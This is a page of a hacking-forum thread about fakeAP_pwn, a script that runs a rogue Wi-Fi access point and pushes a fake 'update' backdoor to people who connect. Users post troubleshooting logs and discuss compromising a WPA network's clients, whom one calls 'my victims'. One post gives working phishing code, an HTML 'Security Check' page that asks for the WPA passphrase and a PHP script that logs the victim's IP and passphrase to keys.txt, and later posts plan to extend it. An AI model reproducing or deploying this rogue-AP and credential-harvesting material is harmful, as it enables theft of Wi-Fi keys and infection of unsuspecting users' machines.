Page 11 of 15 FirstFirst ... 910111213 ... LastLast
Results 101 to 110 of 144

Thread: [Script] [Video] fakeAP_pwn (v0.3)

  1. #101
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    6

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Hi g0tmi1k

    Thanks for answer.

    Okay, try setting the mode to "non", as you don't want to allow an Internet connection after becoming infected.
    I did tried it, but the result is the same, see the output please:
    [*] fakeAP_pwn v0.3 (#126)
    [+] Diagnostics mode
    [>] Analyzing: Environment
    [!] 'wlan0' isn't a wireless interface
    [i] Found: wlan1
    [+] Detecting: Kernel
    [+] Detecting: Hardware
    [+] Testing: Network
    [i] interface=eth0
    [i] wifiInterface=wlan1
    [i] apInterface=at0
    [i] essid=Free-WiFi
    [i] channel=1
    [i] apType=airbase-ng
    [i] mode=non
    [i] payload=wkv
    [i] backdoorPath=/root/backdoor.exe
    [i] www=/var/www/fakeAP_pwn
    [i] respond2All=true
    [i] macMode=random
    [i] fakeMac=00:05:7c:9a:58:3f
    [i] extras=false
    [i] mtuMonitor=1800
    [i] mtuAP=1400
    [i] diagnostics=true
    [i] verbose=1
    [i] debug=false
    [i] gateway=
    [i] ourIP=10.0.0.1
    [i] port=28493
    [i] wifiDriver=rtl8187
    [>] Configuring: Environment
    [>] Removing: Temp files
    [>] Stopping: Daemons & Programs
    ./fakeAP_pwn.sh: line 75: 6629 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"
    [>] Configuring: Wireless card
    [i] monitorInterface=mon0
    [>] Configuring: MAC address
    [i] mac=00:0a:00:70:4d:95 (Mediatek Corp.)
    [>] Creating: Scripts
    [>] Creating: Exploit (Windows)
    [>] Creating: Access point
    [>] Configuring: Network
    [>] Configuring: Permissions
    [>] Starting: DHCP
    [>] Starting: DNS
    [>] Starting: Exploit
    [>] Starting: Web server
    [+] Testing: Web server
    [>] Monitoring: Connections
    [i] Waiting for the target to run the "update" file

    But the problem remains, people associate, but very fast the MAC change to incomplete and I can't access anyone, neither over ICMP, TCP or UDP.

    Also, I see this frequently:

    [>] Stopping: Daemons & Programs
    ./fakeAP_pwn.sh: line 75: 6629 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"

    Is it a well-known problem?

    Alot of clients are trying to connect/probing... That might an issue.
    So, I can't be in a place where a lot of wireless network is in use? There is a workaround?

    Your also using VM as well as airbase-ng. Both of theses have issues.
    Why VM is bad? Because of performance? What do you recommend?

    See, I tried hostapd, but if failed very ugly, see below please.
    [*] fakeAP_pwn v0.3 (#126)
    [+] Diagnostics mode
    [>] Analyzing: Environment
    [!] 'wlan0' isn't a wireless interface
    [i] Found: wlan1
    Usage: iw [options] command
    Options:
    --debug enable netlink debugging
    --version show version
    Commands:
    help
    event
    list
    phy <phyname> info
    dev <devname> set channel <channel> [HT20|HT40+|HT40-]
    phy <phyname> set channel <channel> [HT20|HT40+|HT40-]
    dev <devname> set freq <freq> [HT20|HT40+|HT40-]
    phy <phyname> set freq <freq> [HT20|HT40+|HT40-]
    phy <phyname> set name <new name>
    dev <devname> set meshid <meshid>
    dev <devname> set monitor <flag> [...]
    dev <devname> info
    dev <devname> del
    dev <devname> interface add <name> type <type> [mesh_id <meshid>] [flags ...]
    phy <phyname> interface add <name> type <type> [mesh_id <meshid>] [flags ...]
    dev <devname> station dump
    dev <devname> station set <MAC address> plink_action <open|block>
    dev <devname> station del <MAC address>
    dev <devname> station get <MAC address>
    dev <devname> mpath dump
    dev <devname> mpath set <destination MAC address> next_hop <next hop MAC address>
    dev <devname> mpath new <destination MAC address> next_hop <next hop MAC address>
    dev <devname> mpath del <MAC address>
    dev <devname> mpath get <MAC address>
    reg set <ISO/IEC 3166-1 alpha2>
    dev <devname> get mesh_param <param>
    dev <devname> set mesh_param <param> <value>
    [!] wlan1 *MIGHT* not suported by hostapd
    [+] Detecting: Kernel
    [+] Detecting: Hardware
    [+] Testing: Network
    [+] Testing: Internet connection
    [i] interface=eth0
    [i] wifiInterface=wlan1
    [i] apInterface=wlan1
    [i] essid=Free-WiFi
    [i] channel=1
    [i] apType=hostapd
    [i] mode=transparent
    [i] payload=wkv
    [i] backdoorPath=/root/backdoor.exe
    [i] www=/var/www/fakeAP_pwn
    [i] respond2All=true
    [i] macMode=random
    [i] fakeMac=00:05:7c:9a:58:3f
    [i] extras=false
    [i] mtuMonitor=1800
    [i] mtuAP=1400
    [i] diagnostics=true
    [i] verbose=1
    [i] debug=false
    [i] gateway=192.168.167.2
    [i] ourIP=10.0.0.1
    [i] port=37800
    [i] wifiDriver=rtl8187
    [>] Configuring: Environment
    [>] Removing: Temp files
    [>] Stopping: Daemons & Programs
    ./fakeAP_pwn.sh: line 75: 5619 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"
    [i] interface (eth0) IP=192.168.167.129
    [>] Configuring: Wireless card
    [!] Couldn't detect monitorInterface
    [i] Quiting
    ./fakeAP_pwn.sh: line 75: 5656 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"
    [>] Restoring: Environment
    [>] Restoring: Programs[*] Done! (= Have you... g0tmi1k?

    Ideas?

    I'm guessing the "arp -a on windows" issue is because of airbase-ng. Not 100% sure mind you.
    I can't confirm because hostapd is not working.

    airbase-ng is kind of broken? There is a fix?

    Does the target have a gateway IP? DNS?
    Yes.

    I don't understand what you're saying about about "WPATARGET".
    The fakeAP you created was called "Free-WiFi", "WPATARGET" is scanning for networks (hence its probing). [So yes, the ESSID are different?]
    The fakeAP you create is "Open", I have no idea if "WPATARGET" is protected.
    Sorry, it's more like a general wireless hacking question, not completely related to the outputs above.

    I mean, I configured the fake AP to answer to all probes. I want to compromise the network called WPATARGET, my fake AP will answer when someone ask for WPATARGET (I see this on the logs).

    However, the real WAPTARGET has WPA protection and my fake AP is OPEN. So my question is, the real clients (my victims) any how will connect to my fake (OPEN) WPATARGET? Or no way, since the original use encryption (WPA).

    I mean, assuming the target clients use Windows Zero configuration and has WPATARGET saved.

    Thanks a lot and congratulations for good work.

  2. #102
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    fakeAP_pwn v0.3 #127
    Fixed: "Creating temp folder" bug
    Fixed: "Debug output" bug
    Fixed: "WiFi driver" bug
    Fixed: "WiFi Key" bug
    Updated: Internal working
    Updated: "Update" function
    http://code.google.com/p/fakeap-pwn/source/detail?r=127

    Download
    http://www.mediafire.com/?j2hz9rce10zh1w3
    Last edited by g0tmi1k; 11-12-2010 at 01:51 PM.
    Have you...g0tmi1k?

  3. #103
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    @rick.m
    Next time please could you use CODE tags and or pastebin... *Makes reading/understanding "easier"*

    Quote Originally Posted by rick.m View Post
    Also, I see this frequently:

    [>] Stopping: Daemons & Programs
    ./fakeAP_pwn.sh: line 75: 6629 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"

    Is it a well-known problem?
    No, it's not a well known error (first I've hear of it!).
    I'll have a look into it. (I missed it when I was doing 127, I'll try and find a fix for my next release)

    Quote Originally Posted by rick.m View Post
    So, I can't be in a place where a lot of wireless network is in use? There is a workaround?
    I dunno if that is the issue (the mass of wireless networks!), it's a bit hard for me to test this in my lab as well...
    Some how I cant see it being an issue, but it's a possibility of why its not working anyway...
    The only "fix" I could think of right now, would be to use different hardware/drivers and or hostapd. But I really don't know. Just guessing.

    Quote Originally Posted by rick.m View Post
    Why VM is bad? Because of performance? What do you recommend?
    It's recommend not to use VM mainly because of performance, does also have a few odd issues.
    Personally, airbase-ng works ALOT better if used in a real install over VM. Hostapd is the same in both.
    I Recommend doing a real into of backtrack! (If you can install direct onto the HDD, else a USB stick)

    Quote Originally Posted by rick.m View Post
    See, I tried hostapd, but if failed very ugly, see below please.
    *CODE*
    Ideas?
    That MAY be a bug. Not sure. I'll have a look into it as well

    Quote Originally Posted by rick.m View Post
    airbase-ng is kind of broken? There is a fix?
    Yes, airbase-ng does have a few issues - thought this is mainly compatibility issues with your hardware/drivers.
    The best fix - get another wifi card . If you cant for whatever reason, change how your running backtrack.

    Quote Originally Posted by rick.m View Post
    Yes.
    Yes?
    What are you saying yes to?

    Quote Originally Posted by rick.m View Post
    I mean, I configured the fake AP to answer to all probes. I want to compromise the network called WPATARGET, my fake AP will answer when someone ask for WPATARGET (I see this on the logs).

    However, the real WAPTARGET has WPA protection and my fake AP is OPEN. So my question is, the real clients (my victims) any how will connect to my fake (OPEN) WPATARGET? Or no way, since the original use encryption (WPA).

    I mean, assuming the target clients use Windows Zero configuration and has WPATARGET saved.

    Thanks a lot and congratulations for good work.
    fakeAP_pwn isn't YET meant to compromise another wifi, its planned - just not fully coded yet. Just....too "many moving part" at the mo that need fixing before that happens...

    As far as I know, Windows Zero configuration is different in XP to Windows Vista/7. It behaves different. Which OS is your target running?

    Anyway, back to your main question. I'm going to need a bit more information from you, for example - the output from -d, and the tmp/ folder etc. What is your network setup? What hardware? Software? etc etc,..
    Last edited by g0tmi1k; 11-14-2010 at 10:42 PM.
    Have you...g0tmi1k?

  4. #104
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    2

    Wink Re: [Script] [Video] fakeAP_pwn (v0.3)

    When do you expect fakeAP to be able to compromise another wifi AP?

    That is what you need to capture the WPA key for a network if you do not want to use dictionary attack. I am testing the ability to create a fakeAP to replace a current one and see if I can then knock off the connected machines and have them connect instead to my fakeAP and enter there WPA key so I can capture it. I have read that you can setup airbase to look like its WPA or wpa 2 encripted but then accept any passphrase to allow connection. Woundnt that be better for your wpa key finder approach in FakeAP then to setup a fake webpage and wait for the user to install the update. It would be much easyer to get the WPA key that is for sure.

    Have you tried to set it up like that?

  5. #105
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by 00diabolic View Post
    When do you expect fakeAP to be able to compromise another wifi AP?

    That is what you need to capture the WPA key for a network if you do not want to use dictionary attack. I am testing the ability to create a fakeAP to replace a current one and see if I can then knock off the connected machines and have them connect instead to my fakeAP and enter there WPA key so I can capture it. I have read that you can setup airbase to look like its WPA or wpa 2 encripted but then accept any passphrase to allow connection. Woundnt that be better for your wpa key finder approach in FakeAP then to setup a fake webpage and wait for the user to install the update. It would be much easyer to get the WPA key that is for sure.

    Have you tried to set it up like that?
    Compromise another wifi AP is planned for v0.7.
    However, in another project I'm currently coding, wiffy - is able to do a fakeAP attack. (It's in beta at the mo).

    For the record, you'll still going to need to do a dictionary attack, its just a different method of getting the handshake.
    The pass-phase is still going to be sent salted, not in plain text.

    Yes, I've tired that - however its not going to be added till v0.7.
    Have you...g0tmi1k?

  6. #106
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    2

    Wink Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by g0tmi1k View Post
    Compromise another wifi AP is planned for v0.7.
    However, in another project I'm currently coding, wiffy - is able to do a fakeAP attack. (It's in beta at the mo).

    For the record, you'll still going to need to do a dictionary attack, its just a different method of getting the handshake.
    The pass-phase is still going to be sent salted, not in plain text.

    Yes, I've tired that - however its not going to be added till v0.7.
    Ahh ok.. damn so even if they send the WPA key it will be like capturing the handshake and doing a standard dictionary attack? No real benefit to it? Or does this capture reveal more of the key like its length or something for example?

    If you have that kind of ability to have them connected to your fake ap you would think you could get the key with no fuss.

    Maybe running a app to infiltrate there system is necessary after all. There WPA key is stored under network properties under the ESSID.

    Thanks for the reply Ill keep looking into this..

  7. #107
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    below is some sample work for the wpa project

    Code:
    <html>
    <head>
    <title>Security Check</title>
    <script type="text/javascript">
    function checkWholeForm(theForm) {
        var why = "";
    	why += checkPassword(theForm.password.value);
        if (why != "") {
           alert(why);
           return false;
        }
    return true;
    }
    
    function checkPassword (strng) {
    	var error = "";
    	if (strng == "") {
    		error = "You didn't enter a password.\n";
    	}
    	else if ((strng.length < 8) || (strng.length > 63)) {
    		error = "The password is the wrong length.\n";
    	}
    return error;    
    }    
    </script>
    <style type="text/css">
    h3 {
    font-family:Arial,Helvetica,sans-serif;
    margin-top:200px;
    }
    td {
    font-family:Arial,Helvetica,sans-serif;
    font-size:13px;
    font-weight:900;
    }
    </style>
    </head>
    
    <body>
    <h3 align="center">Please confirm your wireless security settings.</h3>
    <table align="center">
    <form action="process.php" onsubmit="return checkWholeForm(this)" method="post">
    <tr>
    	<td align="right">SSID:</td>
    	<td><input type="text" name="ssid" size="30" disabled="disabled" value="linksys"></td>
    </tr>
    <tr>	
    	<td align="right">Authentication Type:</td>
    	<td>
    		<select name="Authentication Type" size="1" disabled="disabled">
    		<option selected value="WPA">WPA</option>
    		</select>
    	</td>
    </tr>	
    <tr>
    	<td align="right">Passphrase:</td>
    	<td>
    		<input type="password" name="password" size="30">
    	</td>
    </tr>
    <tr>	
    	<td>
    	</td>
    	<td align="left">
    		<input type="submit" value="Submit">
    	</td>
    </tr>
    </form>
    </table>
    </body>
    
    </html>
    Code:
    <?php
    header("Location:wpa.html");
    $file=fopen("keys.txt","a") or exit("Unable to open file!");
    $logMsg = $_SERVER["REMOTE_ADDR"] . " " . $_POST['ssid'] . " " . $_POST['password'] . "\n"; 
    fputs($file,$logMsg);
    fclose($file);
    ?>
    Last edited by joker5bb; 11-29-2010 at 03:46 AM.

  8. #108
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    A nice little phishing attack serve it up from webserver on bt? bit like login phishing neat idea. No need for a host banning you

    Keep up the good work
    regards dee

  9. #109
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by pentest09 View Post
    A nice little phishing attack serve it up from webserver on bt? bit like login phishing neat idea. No need for a host banning you

    Keep up the good work
    regards dee
    well im redoing the whole thing with jquery & ajax
    there will be client-side and server-side validation, output to .txt file with ip & passphrase
    also we can write commands to php file to check if the passphrase is correct.
    We are now talking of using 3 wifi cards.

  10. #110
    Member
    Join Date
    Feb 2009
    Location
    0,0
    Posts
    90

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by joker5bb View Post
    well im redoing the whole thing with jquery & ajax
    there will be client-side and server-side validation, output to .txt file with ip & passphrase
    also we can write commands to php file to check if the passphrase is correct.
    We are now talking of using 3 wifi cards.
    Well then luckily I have 3 wifi cards

Page 11 of 15 FirstFirst ... 910111213 ... LastLast

Similar Threads

  1. [Script][Video] EvilGrade (v0.1.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 27
    Last Post: 03-06-2011, 12:24 PM
  2. [Script] [Video] metasploit-FakeUpdate (v0.1.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 30
    Last Post: 12-06-2010, 04:53 PM
  3. [Script][Video] - Using McGrew Security's nbnspoof.py
    By orgcandman in forum Beginners Forum
    Replies: 3
    Last Post: 11-17-2010, 07:36 PM
  4. [Script] [Video] FakeAP_pwn (v0.2.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 184
    Last Post: 09-02-2010, 11:01 AM
  5. Replies: 10
    Last Post: 07-12-2010, 03:04 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •